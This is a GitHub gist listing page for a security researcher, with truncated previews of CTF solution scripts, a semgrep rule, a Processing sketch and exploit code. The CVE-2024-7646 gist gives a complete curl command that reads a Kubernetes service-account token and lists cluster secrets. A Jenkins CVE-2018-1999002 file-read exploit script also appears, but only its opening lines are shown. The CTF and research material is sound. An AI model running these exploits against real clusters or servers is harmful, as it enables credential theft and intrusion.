Skip to content

Instantly share code, notes, and snippets.

View becojo's full-sized avatar
🫒

becojo

🫒
94 followers · 105 following
View GitHub Profile
@becojo
becojo / README.md
Last active August 19, 2024 06:24
CVE-2024-7646 
helm -n ingress-nginx install ingress-nginx ingress-nginx/ingress-nginx --create-namespace --version 4.11.1

kubectl port-forward --namespace=ingress-nginx service/ingress-nginx-controller 8080:80

curl -H 'Host: demo.me' --data 'curl -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" -k https://kubernetes.default.svc.cluster.local/api/v1/namespaces/default/secrets' localhost:8080/exec
@becojo
becojo / go-migrate-dagger.yml
Created July 15, 2024 16:52
rules:
- id: go-migrate-dagger
languages: [go]
patterns:
- pattern-either:
- pattern: func $F(..., $ARG *$T, ...) $RET
- pattern: func $F(...) *$T
- pattern: func(...) *$T { ... }
- pattern: func(..., $ARG *$T, ...) $RET { ... }
- pattern: |
@becojo
becojo / i-messed-up-my-markdown-links.yml
Created July 27, 2023 16:23
@becojo
becojo / challenge1.rego
Created May 22, 2022 23:46
Northsec 2022 CTF - Rego Prototype Review
package challenge1
default correct_flag = false
mycorize(s) := replace(replace(s, "o", "0"), "i", "y")
correct_flag {
words := ["champ", "mycoverse", "exo", "meta", "cyber", "block", "chain", "life"]
parts := split(input.flag, "-")
parts[1] == mycorize(words[x])
@becojo
becojo / beesnbomb-2019-08-05.pde
Last active August 5, 2019 23:34
Recreation of https://twitter.com/beesandbombs/status/1158510574675865600
void setup() {
size(500, 500);
stroke(0);
noStroke();
}
void draw() {
background(#3C5E84);
float r = frameCount / 33.0;
@becojo
becojo / CVE-2018-1999002.py
Created July 23, 2018 20:55
import requests
import sys
import os
PLUGIN = 'credentials'
BACKDIR_COUNT = 10
if len(sys.argv) != 3:
print 'usage:\n\tpython CVE-2018-1999002.py [jenkins base url] [absolute file path]'
print ''
@becojo
becojo / _wawa.py
Last active April 2, 2018 04:21
Nuit du hack CTF quals 2018 - Wawacoin
import requests
from hashpumpy import hashpump
url = 'http://wawacoin.challs.malice.fr/manager'
data = '757365723d64656d6f'.decode('hex')
signature = '9183ff6055a46981f2f71cd36430ed3d9cbf6861'
(m2_s, m2) = hashpump(signature, data, "&user=admin", 16)
@becojo
becojo / cctv.py
Last active November 14, 2017 03:12
DefCamp CTF Finals - Security CCTV (misc) - NorthernCoalition
import cv2
import numpy as np
import os
import subprocess
# Download the current frame
os.system("curl https://security-cctv.dctf-f1nals-2017.def.camp/img/streamframe.png > out.png")
# Find the homography for the QR code displayed on the phone to a 200x200 image
# These are the coordinates of the corners of the QR code on the image
@becojo
becojo / paper_stack.py
Created July 30, 2017 21:35
from z3 import *
def C03011(Qml5):
C12d =0
for Po4M in Qml5:
C12d = (31 * C12d + (Po4M)) & 0xFFFFFFFF
return ((C12d + 0x80000000) & 0xFFFFFFFF) - 0X80000000
username = [BitVec('u' + str(i), 32) for i in range(6)]
@becojo
becojo / pwn250.py
Created July 30, 2017 21:11
#!/usr/bin/env python2
from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
host = "54.153.19.139"
port = 5255